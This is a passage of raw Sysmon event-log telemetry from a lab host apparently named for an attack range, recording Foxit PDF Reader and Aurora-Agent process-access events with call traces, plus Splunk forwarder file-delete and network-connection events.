10341000x800000000000000040517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.538{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64) 10341000x800000000000000040516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.538{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64) 10341000x800000000000000040515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.522{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.506{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc75f(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.506{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc6ae(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.506{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64) 10341000x800000000000000040511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.506{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1fc697(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64) 23542300x800000000000000040510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.491{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:27.141{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=42386A2F212B87A841639F7E4D6E2413,SHA256=5708B2FCB49800E312FCF2F99DC82DBE4ED7DA5A2A30FD56B9D455B19A92FB6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000040541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:26.962{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56249-false10.0.1.12-8089- 10341000x800000000000000040540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.886{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.880{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 10341000x800000000000000040538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.880{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 10341000x800000000000000040537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.879{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64) 10341000x800000000000000040536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.879{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64) 10341000x800000000000000040535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.862{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000040533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000040532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E392-63C7-0A06-00000000AF02}7132C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000040531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.843{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc75f(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.843{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1fc6ae(wow64)|C:\Windows\System32\windows.storage.dll+1fc626(wow64)|C:\Windows\System32\windows.storage.dll+1fc4a8(wow64)|C:\Windows\System32\windows.storage.dll+1fc37b(wow64)|C:\Windows\System32\windows.storage.dll+1fc115(wow64)|C:\Windows\System32\windows.storage.dll+19781e(wow64)|C:\Windows\System32\windows.storage.dll+198b76(wow64)|C:\Windows\System32\windows.storage.dll+19927d(wow64)|C:\Windows\system32\explorerframe.dll+65aad(wow64)|C:\Windows\system32\explorerframe.dll+65dfa(wow64)|C:\Windows\system32\explorerframe.dll+96782(wow64) 10341000x800000000000000040529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:28.843{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF 